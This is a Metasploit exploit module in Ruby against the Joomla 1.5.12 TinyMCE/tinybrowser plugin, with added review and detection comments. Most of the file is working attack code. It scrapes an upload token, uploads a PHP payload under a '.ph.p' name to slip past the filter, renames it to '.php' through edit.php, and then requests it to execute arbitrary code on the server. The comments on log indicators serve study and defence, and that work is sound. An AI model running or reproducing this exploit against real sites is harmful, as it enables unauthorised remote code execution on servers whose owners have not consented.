##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


# Exploit module for the TinyMCE/tinybrowser file-upload weakness in Joomla 1.5.12
# (see 'Description' and 'References' below). The whole interaction is plain HTTP
# against the tinybrowser plugin directory, so every step leaves a request in the
# web server's access log: upload.php, upload_file.php, upload_process.php, edit.php
# and finally a GET of the freshly created script under /images/stories/.
class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient

  # Module metadata and options. The only user option is 'URI', the Joomla
  # base path (defaults to "/"); every request below prefixes it to a static
  # tinybrowser path. Payload is PHP ('Platform' => 'php', ARCH_PHP), limited to
  # 1024 bytes of encoded payload ('Space').
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Joomla 1.5.12 TinyBrowser File Upload Code Execution',
      'Description'    => %q{
        This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.
        This plugin is not secured in version 1.5.12 of joomla and allows the upload
        of files on the remote server.
        By renaming the uploaded file this vulnerability can be used to upload/execute
        code on the affected system.
      },
      'Author'         => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          ['URL', 'http://milw0rm.com/exploits/9296'],
          ['URL', 'http://developer.joomla.org/security/news/301-20090722-core-file-upload.html'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'ConnectionType' => 'find',
            },
          'Space'       => 1024,
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'July 22 2009',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('URI', [true, "Joomla directory path", "/"]),
      ], self.class)
  end

  # Vulnerability check: requests the tinybrowser upload page and reports
  # Vulnerable when the body references flexupload.swf, Safe otherwise
  # (including when no response comes back at all — `res` is nil-guarded).
  # Note that this only confirms the plugin page is reachable; it does not
  # confirm that the upload/rename path below actually works.
  #
  # @return [Exploit::CheckCode] Vulnerable or Safe
  def check
    res = send_request_raw({
      'uri' => datastore['URI'] + '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
    }, 25)

    if (res and res.body =~ /flexupload.swf/)

      return Exploit::CheckCode::Vulnerable

    end

    return Exploit::CheckCode::Safe
  end


  # NOTE(review): empty stub — never called. The obfuscation token is parsed
  # inline in #exploit instead; this method could be removed or made the home
  # of that lookup.
  def retrieve_obfuscation()

  end


  # Runs the four-step upload/rename sequence and then requests the resulting
  # script so the PHP payload executes:
  #   1. GET upload.php to scrape the per-install "obfus" token from the page.
  #   2. POST a multipart form to upload_file.php, storing the payload as
  #      <random>.ph.p (an extension the upload filter does not treat as PHP).
  #   3. GET upload_process.php to finish the upload.
  #   4. POST to edit.php with action=rename to turn .ph.p into .php.
  #   5. GET /images/stories/<random>.php to trigger the payload.
  #
  # Detection: the .ph.p -> .php rename via edit.php and a GET of a random
  # 20-letter .php file under images/stories/ are the distinctive indicators
  # in access logs; the random name is lower-case alpha, 20 characters.
  #
  # @return [void]
  def exploit

    # PHP wrapper around the encoded payload; this is the file body uploaded below.
    cmd_php = '<?php ' + payload.encoded + '?>'

    # Generate some random strings
    cmdscript = rand_text_alpha_lower(20)
    boundary = rand_text_alphanumeric(6)

    # Static files
    directory = '/images/stories/'
    tinybrowserpath = '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/'
    cmdpath = directory + cmdscript   # NOTE(review): assigned but not used below

    # Get obfuscation code (needed to upload files)
    obfuscation_code = nil
    res = send_request_raw({
      'uri' => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='
    }, 25)

    # NOTE(review): only a response *without* the token aborts. When `res` is
    # nil (no response / timeout) execution falls through with
    # obfuscation_code == nil and the upload is still attempted.
    if (res)

      if(res.body =~ /"obfus", "((\w)+)"\)/)
        obfuscation_code = $1
        print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
      else
        print_error("Error retrieving obfuscation code!")
        return
      end
    end



    # Upload shellcode (file ending .ph.p)
    # Hand-built multipart/form-data body with two parts: "Filename" and "Filedata".
    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
    data << "#{cmdscript}.ph.p\r\n--#{boundary}"
    data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"
    data << "Content-Type: application/octet-stream\r\n\r\n"
    data << cmd_php
    data << "\r\n--#{boundary}--"

    # Content-Length is taken from data.length (character count); that matches
    # the byte count only while the payload is ASCII — presumably true for the
    # encoded PHP payload, but worth confirming.
    res = send_request_raw({
      'uri' => datastore['URI'] + tinybrowserpath + "/upload_file.php?folder=/images/stories/&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
      'method' => 'POST',
      'data' => data,
      'headers' =>
        {
          'Content-Length' => data.length,
          'Content-Type' => 'multipart/form-data; boundary=' + boundary,
        }
    }, 25)

    # NOTE(review): an upload failure is reported but does not abort; the
    # rename and payload requests below are still sent.
    if (res and res.body =~ /File Upload Success/)
      print_status("Successfully uploaded #{cmdscript}.ph.p")
    else
      print_error("Error uploading #{cmdscript}.ph.p")
    end


    # Complete the upload process (rename file)
    # (The status text mentions a ".ph.p_" name; the request itself carries no
    # filename, so this is informational only.)
    print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
    res = send_request_raw({
      'uri' => datastore['URI'] + tinybrowserpath + 'upload_process.php?folder=/images/stories/&type=file&feid=&filetotal=1'
    })


    # Rename the file from .ph.p to .php
    # edit.php takes the file name and a new extension separately:
    # renamefile[0]="<name>.ph" + renameext[0]="p" yields "<name>.ph.p" -> "<name>.php".
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => datastore['URI'] + tinybrowserpath + '/edit.php?type=file&folder=',
      'vars_post' =>
        {
          'actionfile[0]' => "#{cmdscript}.ph.p",
          'renameext[0]' => 'p',
          'renamefile[0]' => "#{cmdscript}.ph",
          'sortby' => 'name',
          'sorttype' => 'asc',
          'showpage' => '0',
          'action' => 'rename',
          'commit' => '',

        }
    }, 10)

    # The "." in the regex is unescaped and matches any character; harmless here.
    if (res and res.body =~ /successfully renamed./)
      print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
    else
      print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
    end


    # Finally call the payload
    # Note the hard-coded "images/stories/" here vs. the `directory` local above;
    # both refer to the same path but are not kept in sync by the code.
    print_status("Calling payload: #{cmdscript}.php")
    res = send_request_raw({
      'uri' => "#{datastore['URI'] }images/stories/#{cmdscript}.php"
    }, 25)


  end
end